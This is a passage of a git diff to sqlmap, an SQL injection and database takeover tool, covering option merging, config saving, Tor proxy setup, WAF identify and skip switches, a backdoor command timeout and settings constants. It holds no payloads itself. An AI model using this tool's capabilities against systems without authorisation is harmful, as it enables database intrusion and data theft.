kb.safeReq = AttribDict() kb.singleLogFlags = set() + kb.skipSeqMatcher = False kb.reduceTests = None - kb.tlsSNI = None + kb.tlsSNI = {} kb.stickyDBMS = False kb.stickyLevel = None kb.storeCrawlingChoice = None kb.storeHashesChoice = None kb.suppressResumeInfo = False + kb.tableFrom = None kb.technique = None kb.tempDir = None kb.testMode = False @@ -1879,7 +2014,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.threadContinue = True kb.threadException = False kb.tableExistsChoice = None - kb.timeValidCharsRun = 0 kb.uChar = NULL kb.unionDuplicates = False kb.xpCmdshellAvailable = False @@ -1963,64 +2097,21 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") -def _saveCmdline(): +def _saveConfig(): """ - Saves the command line options on a sqlmap configuration INI file + Saves the command line options to a sqlmap configuration INI file Format. """ - if not conf.saveCmdline: + if not conf.saveConfig: return - debugMsg = "saving command line options on a sqlmap configuration INI file" + debugMsg = "saving command line options to a sqlmap configuration INI file" logger.debug(debugMsg) - config = UnicodeRawConfigParser() - userOpts = {} + saveConfig(conf, conf.saveConfig) - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] - - if value is None: - if datatype == OPTION_TYPE.BOOLEAN: - value = "False" - elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): - if option in defaults: - value = str(defaults[option]) - else: - value = "0" - elif datatype == OPTION_TYPE.STRING: - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(paths.SQLMAP_CONFIG, "wb") - - try: - config.write(confFP) - except IOError, ex: - errMsg = "something went wrong while trying " - errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex) - raise SqlmapSystemException(errMsg) - - infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG + infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig logger.info(infoMsg) def setVerbosity(): @@ -2049,6 +2140,43 @@ def setVerbosity(): elif conf.verbose >= 5: logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) +def _normalizeOptions(inputOptions): + """ + Sets proper option types + """ + + types_ = {} + for group in optDict.keys(): + types_.update(optDict[group]) + + for key in inputOptions: + if key in types_: + value = inputOptions[key] + if value is None: + continue + + type_ = types_[key] + if type_ and isinstance(type_, tuple): + type_ = type_[0] + + if type_ == OPTION_TYPE.BOOLEAN: + try: + value = bool(value) + except (TypeError, ValueError): + value = False + elif type_ == OPTION_TYPE.INTEGER: + try: + value = int(value) + except (TypeError, ValueError): + value = 0 + elif type_ == OPTION_TYPE.FLOAT: + try: + value = float(value) + except (TypeError, ValueError): + value = 0.0 + + inputOptions[key] = value + def _mergeOptions(inputOptions, overrideOptions): """ Merge command line options with configuration file and default options. @@ -2057,9 +2185,6 @@ def _mergeOptions(inputOptions, overrideOptions): @type inputOptions: C{instance} """ - if inputOptions.pickledOptions: - inputOptions = base64unpickle(inputOptions.pickledOptions) - if inputOptions.configFile: configFileParser(inputOptions.configFile) @@ -2072,43 +2197,29 @@ def _mergeOptions(inputOptions, overrideOptions): if key not in conf or value not in (None, False) or overrideOptions: conf[key] = value - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) + if not conf.api: + for key, value in conf.items(): + if value is not None: + kb.explicitSettings.add(key) for key, value in defaults.items(): if hasattr(conf, key) and conf[key] is None: conf[key] = value - _ = {} + lut = {} + for group in optDict.keys(): + lut.update((_.upper(), _) for _ in optDict[group]) + + envOptions = {} for key, value in os.environ.items(): if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): - _[key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()] = value - - types_ = {} - for group in optDict.keys(): - types_.update(optDict[group]) - - for key in conf: - if key.upper() in _ and key in types_: - value = _[key.upper()] - - if types_[key] == OPTION_TYPE.BOOLEAN: - try: - value = bool(value) - except ValueError: - value = False - elif types_[key] == OPTION_TYPE.INTEGER: - try: - value = int(value) - except ValueError: - value = 0 - elif types_[key] == OPTION_TYPE.FLOAT: - try: - value = float(value) - except ValueError: - value = 0.0 + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() + if _ in lut: + envOptions[lut[_]] = value + if envOptions: + _normalizeOptions(envOptions) + for key, value in envOptions.items(): conf[key] = value mergedOptions.update(conf) @@ -2120,8 +2231,14 @@ def _setTrafficOutputFP(): conf.trafficFP = openFile(conf.trafficFile, "w+") +def _setupHTTPCollector(): + if not conf.harFile: + return + + conf.httpCollector = HTTPCollectorFactory(conf.harFile).create() + def _setDNSServer(): - if not conf.dnsName: + if not conf.dnsDomain: return infoMsg = "setting up DNS server instance" @@ -2149,7 +2266,7 @@ def _setProxyList(): return conf.proxyList = [] - for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w.]+):(\d+)", readCachedFileContent(conf.proxyFile)): + for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)): _, type_, address, port = match.groups() conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) @@ -2166,31 +2283,14 @@ def _setTorHttpProxySettings(): infoMsg = "setting Tor HTTP proxy settings" logger.info(infoMsg) - found = None + port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)) - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() - - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) + if port: + conf.proxy = "http://%s:%d" % (LOCALHOST, port) else: - errMsg = "can't establish connection with the Tor proxy. " - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += "successfully use switch '--tor' " - - if IS_WIN: - errMsg += "(e.g. https://www.torproject.org/projects/vidalia.html.en)" - else: - errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)" + errMsg = "can't establish connection with the Tor HTTP proxy. " + errMsg += "Please make sure that you have Tor (bundle) installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " raise SqlmapConnectionException(errMsg) @@ -2206,14 +2306,20 @@ def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" logger.info(infoMsg) - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) + port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,)) + + if not port: + errMsg = "can't establish connection with the Tor SOCKS proxy. " + errMsg += "Please make sure that you have Tor service installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + + raise SqlmapConnectionException(errMsg) + + # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port) socks.wrapmodule(urllib2) def _checkWebSocket(): - infoMsg = "checking for WebSocket" - logger.debug(infoMsg) - if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): try: from websocket import ABNF @@ -2229,9 +2335,13 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + except SqlmapConnectionException: + page = None + if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" + errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) else: infoMsg = "Tor is properly being used" @@ -2264,18 +2374,22 @@ def _basicOptionValidation(): errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" raise SqlmapSyntaxException(errMsg) - if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" - raise SqlmapSyntaxException(errMsg) - if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.eta and conf.verbose > defaults.verbose: + errMsg = "switch '--eta' is incompatible with option '-v'" + raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.url: errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: + errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -2284,6 +2398,10 @@ def _basicOptionValidation(): errMsg = "switch '--dump' is incompatible with switch '--search'" raise SqlmapSyntaxException(errMsg) + if conf.api and not conf.configFile: + errMsg = "switch '--api' requires usage of option '-c'" + raise SqlmapSyntaxException(errMsg) + if conf.data and conf.nullConnection: errMsg = "option '--data' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -2315,15 +2433,15 @@ def _basicOptionValidation(): if conf.regexp: try: re.compile(conf.regexp) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex) + except Exception, ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) if conf.crawlExclude: try: re.compile(conf.crawlExclude) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex) + except Exception, ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) if conf.dumpTable and conf.dumpAll: @@ -2390,6 +2508,10 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" raise SqlmapSyntaxException(errMsg) @@ -2456,13 +2578,12 @@ def _resolveCrossReferences(): lib.core.threads.readInput = readInput lib.core.common.getPageTemplate = getPageTemplate lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage - lib.request.connect.setHTTPProxy = _setHTTPProxy + lib.request.connect.setHTTPHandlers = _setHTTPHandlers + lib.utils.search.setHTTPHandlers = _setHTTPHandlers lib.controller.checks.setVerbosity = setVerbosity + lib.controller.checks.setWafFunctions = _setWafFunctions def initOptions(inputOptions=AttribDict(), overrideOptions=False): - if IS_WIN: - coloramainit() - _setConfAttributes() _setKnowledgeBaseAttributes() _mergeOptions(inputOptions, overrideOptions) @@ -2475,9 +2596,10 @@ def init(): _useWizardInterface() setVerbosity() - _saveCmdline() + _saveConfig() _setRequestFromFile() _cleanupOptions() + _cleanupEnvironment() _dirtyPatches() _purgeOutput() _checkDependencies() @@ -2491,6 +2613,7 @@ def init(): _setTamperingFunctions() _setWafFunctions() _setTrafficOutputFP() + _setupHTTPCollector() _resolveCrossReferences() _checkWebSocket() @@ -2505,13 +2628,13 @@ def init(): _setHTTPHost() _setHTTPUserAgent() _setHTTPAuthentication() - _setHTTPProxy() + _setHTTPHandlers() _setDNSCache() + _setSocketPreConnect() _setSafeVisit() - _setGoogleDorking() + _doSearch() _setBulkMultipleTargets() _setSitemapTargets() - _urllib2Opener() _checkTor() _setCrawler() _findPageForms() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index b9adbd67b..e17937c46 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -37,11 +37,14 @@ optDict = { "headers": "string", "authType": "string", "authCred": "string", - "authPrivate": "string", + "authFile": "string", + "ignore401": "boolean", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", "proxy": "string", "proxyCred": "string", "proxyFile": "string", - "ignoreProxy": "boolean", "tor": "boolean", "torPort": "integer", "torType": "string", @@ -74,6 +77,7 @@ optDict = { "testParameter": "string", "skip": "string", "skipStatic": "boolean", + "paramExclude": "string", "dbms": "string", "dbmsCred": "string", "os": "string", @@ -104,7 +108,7 @@ optDict = { "uCols": "string", "uChar": "string", "uFrom": "string", - "dnsName": "string", + "dnsDomain": "string", "secondOrder": "string", }, @@ -136,6 +140,7 @@ optDict = { "tbl": "string", "col": "string", "excludeCol": "string", + "pivotColumn": "string", "dumpWhere": "string", "user": "string", "excludeSysDbs": "boolean", @@ -189,7 +194,9 @@ optDict = { #"xmlFile": "string", "trafficFile": "string", "batch": "boolean", + "binaryFields": "string", "charset": "string", + "checkInternet": "boolean", "crawlDepth": "integer", "crawlExclude": "string", "csvDel": "string", @@ -198,13 +205,14 @@ optDict = { "flushSession": "boolean", "forms": "boolean", "freshQueries": "boolean", + "harFile": "string", "hexConvert": "boolean", "outputDir": "string", "parseErrors": "boolean", - "pivotColumn": "string", - "saveCmdline": "boolean", + "saveConfig": "string", "scope": "string", "testFilter": "string", + "testSkip": "string", "updateAll": "boolean", }, @@ -216,25 +224,31 @@ optDict = { "dependencies": "boolean", "disableColoring": "boolean", "googlePage": "integer", + "identifyWaf": "boolean", "mobile": "boolean", "offline": "boolean", - "pageRank": "boolean", "purgeOutput": "boolean", + "skipWaf": "boolean", "smart": "boolean", + "tmpDir": "string", + "webRoot": "string", "wizard": "boolean", "verbose": "integer", }, "Hidden": { "dummy": "boolean", - "binaryFields": "string", + "disablePrecon": "boolean", "profile": "boolean", - "cpuThrottle": "integer", "forceDns": "boolean", - "identifyWaf": "boolean", - "ignore401": "boolean", + "murphyRate": "integer", "smokeTest": "boolean", "liveTest": "boolean", "stopFail": "boolean", "runCase": "string", + }, + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", } } diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c212a0bb5..ff1cc3f1d 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -26,9 +26,8 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): import gtk import pydot except ImportError, e: - errMsg = "profiling requires third-party libraries (%s). " % getUnicode(e, UNICODE_ENCODING) - errMsg += "Quick steps:%s" % os.linesep - errMsg += "1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz" + errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING) + errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')" logger.error(errMsg) return @@ -76,6 +75,11 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): # Create graph image (png) by using pydot (python-pydot) # http://code.google.com/p/pydot/ pydotGraph = pydot.graph_from_dot_file(dotOutputFile) + + # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ + if isinstance(pydotGraph, list): + pydotGraph = pydotGraph[0] + pydotGraph.write_png(imageOutputFile) infoMsg = "displaying interactive graph with xdot library" @@ -87,5 +91,4 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): win.connect('destroy', gtk.main_quit) win.set_filter("dot") win.open_file(dotOutputFile) - gobject.timeout_add(1000, win.update, dotOutputFile) gtk.main() diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 2dc0467c4..cf95f3926 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/replication.py b/lib/core/replication.py index c5bbd24cc..1bcbeb2a7 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import sqlite3 from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING class Replication(object): """ @@ -19,10 +22,15 @@ class Replication(object): """ def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() + try: + self.dbpath = dbpath + self.connection = sqlite3.connect(dbpath) + self.connection.isolation_level = None + self.cursor = self.connection.cursor() + except sqlite3.OperationalError, ex: + errMsg = "error occurred while opening a replication " + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) class DataType: """ @@ -49,11 +57,16 @@ class Replication(object): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception, ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -70,7 +83,7 @@ class Replication(object): try: self.parent.cursor.execute(sql, parameters) except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex) + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) diff --git a/lib/core/revision.py b/lib/core/revision.py index 5319f1aa3..0c1682789 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,15 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re - -from subprocess import PIPE -from subprocess import Popen as execute +import subprocess def getRevisionNumber(): """ @@ -46,7 +44,7 @@ def getRevisionNumber(): break if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) + process = subprocess.Popen("git rev-parse --verify HEAD", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") retVal = match.group(0) if match else None diff --git a/lib/core/session.py b/lib/core/session.py index 68b4e13a4..574e3415e 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -26,12 +26,14 @@ def setDbms(dbms): hashDBWrite(HASHDB_KEYS.DBMS, dbms) _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("^%s" % _, dbms, re.I) + _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) if _: dbms = _.group(1) Backend.setDbms(dbms) + if kb.resolutionDbms: + hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms) logger.info("the back-end DBMS is %s" % Backend.getDbms()) diff --git a/lib/core/settings.py b/lib/core/settings.py old mode 100644 new mode 100755 index 325855514..f1773e695 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,26 +1,28 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os +import random import re import subprocess import string import sys -import time +import types +from lib.core.datatype import AttribDict from lib.core.enums import DBMS from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS -from lib.core.revision import getRevisionNumber -# sqlmap version and site -VERSION = "1.0-dev" -REVISION = getRevisionNumber() -VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "-nongit-%s" % time.strftime("%Y%m%d", time.gmtime(os.path.getctime(__file__)))) +# sqlmap version (...) +VERSION = "1.1.7.3" +TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" +TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} +VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" SITE = "http://sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" @@ -28,20 +30,25 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" # colorful banner -BANNER = """\033[01;33m _ - ___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m -|_ -| . | | | .'| . | -|___|_ |_|_|_|_|__,| _| - |_| |_| \033[0m\033[4;37m%s\033[0m\n -""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE) +BANNER = """\033[01;33m\ + ___ + __H__ + ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m +|_ -| . [.] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V |_| \033[0m\033[4;37m%s\033[0m\n +""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) # Minimum distance of ratio from kb.matchRatio to result in True DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 -# Ratio used in heuristic check for WAF/IDS/IPS protected targets +# Ratio used in heuristic check for WAF/IPS/IDS protected targets IDS_WAF_CHECK_RATIO = 0.5 +# Timeout used in heuristic check for WAF/IPS/IDS protected targets +IDS_WAF_CHECK_TIMEOUT = 10 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 @@ -55,11 +62,19 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" URI_QUESTION_MARKER = "__QUESTION_MARK__" ASTERISK_MARKER = "__ASTERISK_MARK__" REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__" + +RANDOM_INTEGER_MARKER = "[RANDINT]" +RANDOM_STRING_MARKER = "[RANDSTR]" +SLEEP_TIME_MARKER = "[SLEEPTIME]" PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" +# Regular expression used for extraction of table names (useful for (e.g.) MsAccess) +SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P([\w.]|`[^`<>]+`)+)" + # Regular expression used for recognition of textual content-type TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" @@ -69,17 +84,32 @@ PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" # Regular expression used for recognition of generic maximum connection messages MAX_CONNECTIONS_REGEX = r"max.+connections" +# Maximum consecutive connection errors before asking the user if he wants to continue +MAX_CONSECUTIVE_CONNECTION_ERRORS = 15 + +# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) +PRECONNECT_CANDIDATE_TIMEOUT = 10 + +# Maximum sleep time in "Murphy" (testing) mode +MAX_MURPHY_SLEEP_TIME = 3 + # Regular expression used for extracting results from Google search -GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" +GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" # Regular expression used for extracting results from DuckDuckGo search DUCKDUCKGO_REGEX = r'"u":"([^"]+)' +# Regular expression used for extracting results from Disconnect Search +DISCONNECT_SEARCH_REGEX = r'

([^<]+)

' + +# Dummy user agent for search (if default one returns different results) +DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0" + # Regular expression used for extracting content from "textual" tags TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P[^<]+)" # Regular expression used for recognition of IP addresses -IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" +IP_ADDRESS_REGEX = r"\b(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\b" # Regular expression used for recognition of generic "your ip has been blocked" messages BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)" @@ -107,7 +137,7 @@ UNION_STDEV_COEFF = 7 TIME_DELAY_CANDIDATES = 3 # Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +HTTP_ACCEPT_HEADER_VALUE = "*/*" # Default value for HTTP Accept-Encoding header HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" @@ -115,6 +145,9 @@ HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" # Default timeout for running commands over backdoor BACKDOOR_RUN_CMD_TIMEOUT = 5 +# Number of seconds to wait for thread finalization at program end +THREAD_FINALIZATION_TIMEOUT = 1 + # Maximum number of techniques used in inject.py/getValue() per one value MAX_TECHNIQUES_PER_VALUE = 2 @@ -124,6 +157,9 @@ MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 # Suffix used for naming meta databases in DBMS(es) without explicit database name METADB_SUFFIX = "_masterdb" +# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt) +PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3 + # Minimum time response set needed for time-comparison based on standard deviation MIN_TIME_RESPONSES = 30 @@ -172,26 +208,20 @@ PYVERSION = sys.version.split()[0] # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME +MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") +PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") +ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", 